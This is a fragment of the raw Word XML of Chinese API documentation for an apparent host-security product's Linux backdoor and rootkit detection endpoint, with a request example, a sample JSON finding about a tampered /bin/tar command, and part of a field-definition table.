          <w:p w14:paraId="4BB79610" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1272A09A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4B3191" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB936A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F07D065" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5287F80E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统文件状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45440F32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13368939" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49D2ADB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325F75CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E3B0415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29187232" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1B677" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321C5F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oldtcm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1528398278,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backDoorType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Rootkit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backDoorName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "检查\"/bin/tar\"命令",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backDoorCheckName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "基本命令检查",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "通过检测strings命令成功后，利用strings命令打印命令的段信息，然后查找这些命令中是否有特征值，如果有那么表示该命令有问题",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "detail": "{\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":\"/bin/tar\",\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>match_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":{\"137\":\"^...s\"}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "instruct": "替换相应命令，并且重新检查",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3E97F"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2263"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4297"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="64ABE14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E118E64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029089B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DFF0C69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C8C126E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B27EBEC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30EF0A8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D74E3A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684E06A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14625372" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="494CA10B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6592765A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ED34EAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7E704E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA74D48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3678AE07" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BCAED54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52FF6A2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B996F88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="385881CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B5282C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB9157D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7A392C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F021E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B5086DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EAC8531" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576F2856" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6B5FC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58455A42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77A48C6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4593CEDC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7EA735" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04E16038" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5534EE27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA135A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67DC2C8D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5273B88B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7B988B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C97E37C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FF07D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F26F161" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A60394" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE3FCE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18696C2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F67E0C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F382B16" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44071431" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9E82AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02080FC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A50F79E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14EEDEAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D9CECA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DEE3D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD77B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A534FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12CBD42E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE143A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
